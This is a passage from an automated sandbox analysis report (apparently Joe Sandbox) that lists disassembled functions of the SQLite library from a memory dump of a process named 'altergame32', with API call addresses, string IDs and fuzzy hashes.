                                                                  • sqlite3_column_int.SQLITE3 ref: 609680F3
                                                                  • sqlite3_reset.SQLITE3 ref: 60968104
                                                                  • sqlite3_step.SQLITE3 ref: 60968139
                                                                  • sqlite3_column_int64.SQLITE3 ref: 60968151
                                                                  • sqlite3_reset.SQLITE3 ref: 6096818A
                                                                    • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED2B
                                                                    • Part of subcall function 6095ECA6: sqlite3_bind_value.SQLITE3 ref: 6095EDDF
                                                                  • sqlite3_reset.SQLITE3 ref: 609679E9
                                                                    • Part of subcall function 609160CD: sqlite3_realloc.SQLITE3 ref: 609160EF
                                                                  • sqlite3_column_bytes.SQLITE3 ref: 60967587
                                                                    • Part of subcall function 6091D5DC: sqlite3_value_bytes.SQLITE3 ref: 6091D5F4
                                                                  • sqlite3_column_blob.SQLITE3 ref: 60967572
                                                                    • Part of subcall function 6091D57E: sqlite3_value_blob.SQLITE3 ref: 6091D596
                                                                  • sqlite3_reset.SQLITE3 ref: 609675B7
                                                                  • sqlite3_bind_int.SQLITE3 ref: 60967641
                                                                  • sqlite3_step.SQLITE3 ref: 6096764C
                                                                  • sqlite3_column_int64.SQLITE3 ref: 6096766E
                                                                  • sqlite3_reset.SQLITE3 ref: 6096768B
                                                                  • sqlite3_bind_int.SQLITE3 ref: 6096754F
                                                                    • Part of subcall function 609256E5: sqlite3_bind_int64.SQLITE3 ref: 60925704
                                                                  • sqlite3_bind_int.SQLITE3 ref: 609690B2
                                                                  • sqlite3_bind_blob.SQLITE3 ref: 609690DB
                                                                  • sqlite3_step.SQLITE3 ref: 609690E6
                                                                  • sqlite3_reset.SQLITE3 ref: 609690F1
                                                                  • sqlite3_free.SQLITE3 ref: 60969102
                                                                  • sqlite3_free.SQLITE3 ref: 6096910D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3049400617.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                  • Associated: 00000006.00000002.3049381408.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049450262.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049470005.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049490074.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049508003.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049525902.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_60900000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: sqlite3_reset$sqlite3_step$sqlite3_column_int64sqlite3_free$sqlite3_bind_int64$sqlite3_bind_int$sqlite3_column_blobsqlite3_column_bytessqlite3_mallocsqlite3_mprintf$sqlite3_column_intsqlite3_mutex_leave$memcmpsqlite3_bind_blobsqlite3_bind_valuesqlite3_blob_bytessqlite3_blob_readsqlite3_blob_reopensqlite3_initializesqlite3_mutex_entersqlite3_prepare_v2sqlite3_reallocsqlite3_value_blobsqlite3_value_bytes
                                                                  • String ID: $d
                                                                  • API String ID: 2451604321-2084297493
                                                                  • Opcode ID: 8a4e51d2763d1baa8146902d495da2ef892242416c9706ebfa3093aedc646825
                                                                  • Instruction ID: 6b7ea73e19bc996eb6a422b8fcf26663d3cb25e4dd91ceba81a4d6a678ae72ab
                                                                  • Opcode Fuzzy Hash: 8a4e51d2763d1baa8146902d495da2ef892242416c9706ebfa3093aedc646825
                                                                  • Instruction Fuzzy Hash: 2CF2CF74A152288FDB54CF68C980B9EBBF2BF69304F1185A9E888A7341D774ED85CF41
                                                                  Function 609660FA Relevance: 39.4, APIs: 19, Strings: 3, Instructions: 926COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • sqlite3_finalize.SQLITE3 ref: 60966178
                                                                  • sqlite3_free.SQLITE3 ref: 60966183
                                                                  • sqlite3_value_numeric_type.SQLITE3 ref: 609661AE
                                                                  • sqlite3_value_numeric_type.SQLITE3 ref: 609661DE
                                                                  • sqlite3_value_text.SQLITE3 ref: 60966236
                                                                  • sqlite3_value_int.SQLITE3 ref: 60966274
                                                                  • memcmp.MSVCRT ref: 6096639E
                                                                    • Part of subcall function 60940A5B: sqlite3_malloc.SQLITE3 ref: 60940AA1
                                                                    • Part of subcall function 60940A5B: sqlite3_free.SQLITE3 ref: 60940C1D
                                                                  • sqlite3_mprintf.SQLITE3 ref: 60966B51
                                                                  • sqlite3_mprintf.SQLITE3 ref: 60966B7D
                                                                    • Part of subcall function 609296AA: sqlite3_initialize.SQLITE3 ref: 609296B0
                                                                    • Part of subcall function 609296AA: sqlite3_vmprintf.SQLITE3 ref: 609296CA
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3049400617.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                  • Associated: 00000006.00000002.3049381408.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049450262.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049470005.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049490074.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049508003.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049525902.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_60900000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: sqlite3_freesqlite3_mprintfsqlite3_value_numeric_type$memcmpsqlite3_finalizesqlite3_initializesqlite3_mallocsqlite3_value_intsqlite3_value_textsqlite3_vmprintf
                                                                  • String ID: ASC$DESC$x
                                                                  • API String ID: 4082667235-1162196452
                                                                  • Opcode ID: 7264e4280a4ba67b830c3238f8418230a53be4a89f04bb086879d88682624c0f
                                                                  • Instruction ID: 01f4316cc9c65235d83944c747b96ccca9397e1276bdc6c450b31a73d7ca280a
                                                                  • Opcode Fuzzy Hash: 7264e4280a4ba67b830c3238f8418230a53be4a89f04bb086879d88682624c0f
                                                                  • Instruction Fuzzy Hash: AD921274A14319CFEB10CFA9C99079DBBB6BF69304F20816AD858AB342D774E985CF41
                                                                  Function 6096923E Relevance: 29.3, APIs: 19, Instructions: 779COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • sqlite3_bind_int64.SQLITE3(?,?), ref: 609693A5
                                                                  • sqlite3_step.SQLITE3(?,?), ref: 609693B0
                                                                  • sqlite3_column_int64.SQLITE3(?,?), ref: 609693DC
                                                                    • Part of subcall function 6096A2BD: sqlite3_bind_int64.SQLITE3 ref: 6096A322
                                                                    • Part of subcall function 6096A2BD: sqlite3_step.SQLITE3 ref: 6096A32D
                                                                    • Part of subcall function 6096A2BD: sqlite3_column_int.SQLITE3 ref: 6096A347
                                                                    • Part of subcall function 6096A2BD: sqlite3_reset.SQLITE3 ref: 6096A354
                                                                  • sqlite3_reset.SQLITE3(?,?), ref: 609693F3
                                                                  • sqlite3_malloc.SQLITE3(?), ref: 60969561
                                                                  • sqlite3_malloc.SQLITE3(?), ref: 6096958D
                                                                  • sqlite3_step.SQLITE3(?), ref: 609695D2
                                                                  • sqlite3_column_int64.SQLITE3(?), ref: 609695EA
                                                                  • sqlite3_reset.SQLITE3(?), ref: 60969604
                                                                  • sqlite3_realloc.SQLITE3(?), ref: 609697D0
                                                                  • sqlite3_realloc.SQLITE3(?), ref: 609698A9
                                                                    • Part of subcall function 609129D5: sqlite3_initialize.SQLITE3(?,?,?,60915F55,?,?,?,?,?,?,00000000,?,?,?,60915FE2,00000000), ref: 609129E0
                                                                  • sqlite3_bind_int64.SQLITE3(?,?), ref: 609699B8
                                                                  • sqlite3_bind_int64.SQLITE3(?), ref: 6096934D
                                                                    • Part of subcall function 60925686: sqlite3_mutex_leave.SQLITE3 ref: 609256D3
                                                                  • sqlite3_bind_int64.SQLITE3(?,?), ref: 60969A6A
                                                                  • sqlite3_step.SQLITE3(?,?), ref: 60969A75
                                                                  • sqlite3_reset.SQLITE3(?,?), ref: 60969A80
                                                                  • sqlite3_free.SQLITE3(?), ref: 60969D41
                                                                  • sqlite3_free.SQLITE3(?), ref: 60969D4C
                                                                  • sqlite3_free.SQLITE3(?), ref: 60969D5B
                                                                    • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED06
                                                                    • Part of subcall function 6095ECA6: sqlite3_prepare_v2.SQLITE3 ref: 6095ED8D
                                                                    • Part of subcall function 6095ECA6: sqlite3_free.SQLITE3 ref: 6095ED9B
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3049400617.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                  • Associated: 00000006.00000002.3049381408.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049450262.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049470005.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049490074.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049508003.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049525902.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_60900000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: sqlite3_bind_int64$sqlite3_freesqlite3_resetsqlite3_step$sqlite3_column_int64sqlite3_mallocsqlite3_realloc$sqlite3_column_intsqlite3_initializesqlite3_mprintfsqlite3_mutex_leavesqlite3_prepare_v2
                                                                  • String ID:
                                                                  • API String ID: 961572588-0
                                                                  • Opcode ID: c724daf3936d67fd3e7a59374d144345718a9f8d9c21f3c7abba70c9fa35c0f4
                                                                  • Instruction ID: dba6eef834311e7f80380fc62c490a647dd1765b4da9a7e0a506f520bf28697a
                                                                  • Opcode Fuzzy Hash: c724daf3936d67fd3e7a59374d144345718a9f8d9c21f3c7abba70c9fa35c0f4
                                                                  • Instruction Fuzzy Hash: 9872F275A042298FDB24CF69C88078DB7F6FF98314F1586A9D889AB341D774AD81CF81
                                                                  Function 60963143 Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 301COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3049400617.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                  • Associated: 00000006.00000002.3049381408.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049450262.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049470005.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049490074.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049508003.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049525902.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_60900000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: sqlite3_bind_int64sqlite3_mutex_leavesqlite3_stricmp
                                                                  • String ID: 2$foreign key$indexed
                                                                  • API String ID: 4126863092-702264400
                                                                  • Opcode ID: efb0247afb620838301bdf32ec29a55ffab8ab84c5461d6934eb6e15b590f11f
                                                                  • Instruction ID: 3d5d194cd292e354de8359ea213fef7e5121ae3f60f7d2d7ba557b44893e8b9c
                                                                  • Opcode Fuzzy Hash: efb0247afb620838301bdf32ec29a55ffab8ab84c5461d6934eb6e15b590f11f
                                                                  • Instruction Fuzzy Hash: 6BE1B374A142099FDB04CFA8D590A9DBBF2BFA9304F21C129E855AB754DB35ED82CF40
                                                                  Function 6093323D Relevance: 9.2, APIs: 2, Strings: 3, Instructions: 432COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3049400617.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                  • Associated: 00000006.00000002.3049381408.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049450262.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049470005.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049490074.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049508003.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049525902.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_60900000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: sqlite3_stricmp
                                                                  • String ID: USING COVERING INDEX $DISTINCT$ORDER BY
                                                                  • API String ID: 912767213-1308749736
                                                                  • Opcode ID: 5e6ae8a77223c4cf3853263767bd84c2ef0a0cb2633a4755bdfaa367f33b2fd5
                                                                  • Instruction ID: 4f43644a9add5c5df618cbd47cd61ce2203d262f2077f605e752fe25420d36ab
                                                                  • Opcode Fuzzy Hash: 5e6ae8a77223c4cf3853263767bd84c2ef0a0cb2633a4755bdfaa367f33b2fd5
                                                                  • Instruction Fuzzy Hash: 2412D674A08268CFDB25DF28C880B5AB7B3AFA9314F1085E9E8899B355D774DD81CF41
                                                                  Function 6094B407 Relevance: 9.1, APIs: 6, Instructions: 99COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • sqlite3_bind_int64.SQLITE3 ref: 6094B488
                                                                  • sqlite3_step.SQLITE3 ref: 6094B496
                                                                  • sqlite3_reset.SQLITE3 ref: 6094B4A4
                                                                  • sqlite3_bind_int64.SQLITE3 ref: 6094B4D2
                                                                  • sqlite3_step.SQLITE3 ref: 6094B4E0
                                                                  • sqlite3_reset.SQLITE3 ref: 6094B4EE
                                                                    • Part of subcall function 6094B54C: memmove.MSVCRT(?,?,?,?,?,?,?,?,00000000,?,6094B44B), ref: 6094B6B5
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3049400617.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                  • Associated: 00000006.00000002.3049381408.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049450262.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049470005.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049490074.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049508003.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049525902.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_60900000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: sqlite3_bind_int64sqlite3_resetsqlite3_step$memmove
                                                                  • String ID:
                                                                  • API String ID: 4082478743-0
                                                                  • Opcode ID: 967f7dd55d0e0ed5657609aa573e07de9c17706341fbe9ef37ba536950e7892f
                                                                  • Instruction ID: 9e7f29540a3c6f2d28ce6b101cd1a975f5529a8f599b89b7128c34d749e8d9ce
                                                                  • Opcode Fuzzy Hash: 967f7dd55d0e0ed5657609aa573e07de9c17706341fbe9ef37ba536950e7892f
                                                                  • Instruction Fuzzy Hash: DD41D2B4A087018FCB50DF69C484A9EB7F6EFA8364F158929EC99CB315E734E8418F51
                                                                  Function 6094D33B Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 171COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • sqlite3_mutex_enter.SQLITE3 ref: 6094D354
                                                                  • sqlite3_mutex_leave.SQLITE3 ref: 6094D546
                                                                    • Part of subcall function 60905D76: sqlite3_stricmp.SQLITE3 ref: 60905D8B
                                                                    • Part of subcall function 60905D76: sqlite3_stricmp.SQLITE3 ref: 60905DA4
                                                                    • Part of subcall function 60905D76: sqlite3_stricmp.SQLITE3 ref: 60905DB8
                                                                  • sqlite3_stricmp.SQLITE3 ref: 6094D3DA
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3049400617.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                  • Associated: 00000006.00000002.3049381408.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049450262.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049470005.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049490074.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049508003.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049525902.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_60900000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: sqlite3_stricmp$sqlite3_mutex_entersqlite3_mutex_leave
                                                                  • String ID: BINARY$INTEGER
                                                                  • API String ID: 317512412-1676293250
                                                                  • Opcode ID: a7efc97792d1e6a4bc5cda92ab6d03f9066f32250883ff14ac0274f07e3e06bf
                                                                  • Instruction ID: cace79839434994537c0410bddb438ad3d501bddbf1b20fcc6a8a8bdb5da7fdd
                                                                  • Opcode Fuzzy Hash: a7efc97792d1e6a4bc5cda92ab6d03f9066f32250883ff14ac0274f07e3e06bf
                                                                  • Instruction Fuzzy Hash: 8E712978A056099BDB05CF69C49079EBBF2BFA8308F11C529EC55AB3A4D734E941CF80
                                                                  Function 6093F42E Relevance: 6.4, APIs: 4, Instructions: 416COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • sqlite3_mutex_enter.SQLITE3 ref: 6093F443
                                                                    • Part of subcall function 60904396: sqlite3_mutex_try.SQLITE3(?,?,?,60908235), ref: 609043B8
                                                                  • sqlite3_mutex_enter.SQLITE3 ref: 6093F45C
                                                                    • Part of subcall function 60939559: memcmp.MSVCRT ref: 60939694
                                                                    • Part of subcall function 60939559: memcmp.MSVCRT ref: 609396CA
                                                                  • sqlite3_mutex_leave.SQLITE3 ref: 6093F8CD
                                                                  • sqlite3_mutex_leave.SQLITE3 ref: 6093F8E3
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3049400617.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                  • Associated: 00000006.00000002.3049381408.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049450262.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049470005.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049490074.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049508003.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049525902.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_60900000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: memcmpsqlite3_mutex_entersqlite3_mutex_leave$sqlite3_mutex_try
                                                                  • String ID:
                                                                  • API String ID: 4038589952-0
                                                                  • Opcode ID: 29e5932b9866e1e5e2fcd92ac707fe98724786dada8c9b11deae4621e05e1fb7
                                                                  • Instruction ID: 916146ddc5613ce70bfe97dc7fabc38680eb49f4f4fdba01105907ea2da9c682
                                                                  • Opcode Fuzzy Hash: 29e5932b9866e1e5e2fcd92ac707fe98724786dada8c9b11deae4621e05e1fb7
                                                                  • Instruction Fuzzy Hash: 87F13674A046158FDB18CFA9C590A9EB7F7AFA8308F248429E846AB355D774EC42CF40
                                                                  Function 6096A38C Relevance: 6.1, APIs: 4, Instructions: 76COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED06
                                                                    • Part of subcall function 6095ECA6: sqlite3_prepare_v2.SQLITE3 ref: 6095ED8D
                                                                    • Part of subcall function 6095ECA6: sqlite3_free.SQLITE3 ref: 6095ED9B
                                                                  • sqlite3_bind_int.SQLITE3 ref: 6096A3DE
                                                                    • Part of subcall function 609256E5: sqlite3_bind_int64.SQLITE3 ref: 60925704
                                                                  • sqlite3_column_int.SQLITE3 ref: 6096A3F3
                                                                  • sqlite3_step.SQLITE3 ref: 6096A435
                                                                  • sqlite3_reset.SQLITE3 ref: 6096A445
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3049400617.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                  • Associated: 00000006.00000002.3049381408.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049450262.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049470005.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049490074.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049508003.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049525902.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_60900000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: sqlite3_bind_intsqlite3_bind_int64sqlite3_column_intsqlite3_freesqlite3_mprintfsqlite3_prepare_v2sqlite3_resetsqlite3_step
                                                                  • String ID:
                                                                  • API String ID: 247099642-0
                                                                  • Opcode ID: 64427881e425bd4a7d2fa305579facb0dd1ab8a71ce9f1271cd8f49c57a97bec
                                                                  • Instruction ID: 69535c0605dcb565d56369453fd68d3a3097adfd173720c6e67b3d4aca8354ad
                                                                  • Opcode Fuzzy Hash: 64427881e425bd4a7d2fa305579facb0dd1ab8a71ce9f1271cd8f49c57a97bec
                                                                  • Instruction Fuzzy Hash: FF2151B0A143148BEB109FA9D88479EB7FAEF64308F00852DE89597350EBB8D845CF51
                                                                  Function 6096A2BD Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED06
                                                                    • Part of subcall function 6095ECA6: sqlite3_prepare_v2.SQLITE3 ref: 6095ED8D
                                                                    • Part of subcall function 6095ECA6: sqlite3_free.SQLITE3 ref: 6095ED9B
                                                                  • sqlite3_bind_int64.SQLITE3 ref: 6096A322
                                                                    • Part of subcall function 60925686: sqlite3_mutex_leave.SQLITE3 ref: 609256D3
                                                                  • sqlite3_step.SQLITE3 ref: 6096A32D
                                                                  • sqlite3_column_int.SQLITE3 ref: 6096A347
                                                                    • Part of subcall function 6091D4F4: sqlite3_value_int.SQLITE3 ref: 6091D50C
                                                                  • sqlite3_reset.SQLITE3 ref: 6096A354
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3049400617.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                  • Associated: 00000006.00000002.3049381408.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049450262.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049470005.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049490074.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049508003.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049525902.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_60900000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: sqlite3_bind_int64sqlite3_column_intsqlite3_freesqlite3_mprintfsqlite3_mutex_leavesqlite3_prepare_v2sqlite3_resetsqlite3_stepsqlite3_value_int
                                                                  • String ID:
                                                                  • API String ID: 326482775-0
                                                                  • Opcode ID: de94f0bba3b8b54078f1ceecce583a965f8e010bb36370f6070bcd8bc28ee8b0
                                                                  • Instruction ID: 7c1586c82cd56d85cf32929a5cd575737867df940847ca2bf63216634e784e33
                                                                  • Opcode Fuzzy Hash: de94f0bba3b8b54078f1ceecce583a965f8e010bb36370f6070bcd8bc28ee8b0
                                                                  • Instruction Fuzzy Hash: 0E214DB0A043049BDB04DFA9C480B9EF7FAEFA8354F04C429E8959B340E778D8418B51
                                                                  Function 6090C1D6 Relevance: 3.0, APIs: 2, Instructions: 39COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • sqlite3_mutex_enter.SQLITE3 ref: 6090C1EA
                                                                  • sqlite3_mutex_leave.SQLITE3 ref: 6090C22F
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3049400617.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                  • Associated: 00000006.00000002.3049381408.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049450262.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049470005.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049490074.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049508003.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049525902.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_60900000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                                  • String ID:
                                                                  • API String ID: 1477753154-0
                                                                  • Opcode ID: 8c595cf50166d2d57a1b46d7a61a8743a20f226779b5cb212a2500e19f50b056
                                                                  • Instruction ID: fc120f7ed3300d8301d0f99cb769197b575d5683181bd6b289e4b53452841bc5
                                                                  • Opcode Fuzzy Hash: 8c595cf50166d2d57a1b46d7a61a8743a20f226779b5cb212a2500e19f50b056
                                                                  • Instruction Fuzzy Hash: 6501F4715042548BDB449F2EC4C576EBBEAEF65318F048469DD419B326D374D882CBA1
                                                                  Function 609254B1 Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 6092535E: sqlite3_log.SQLITE3 ref: 60925406
                                                                  • sqlite3_mutex_leave.SQLITE3 ref: 60925508
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3049400617.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                  • Associated: 00000006.00000002.3049381408.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049450262.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049470005.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049490074.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049508003.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049525902.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_60900000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: sqlite3_logsqlite3_mutex_leave
                                                                  • String ID:
                                                                  • API String ID: 1465156292-0
                                                                  • Opcode ID: 7f15987c0945e0fd4273a36fcce91cc0d916abb620506d2e7fdad6d0c82ef640
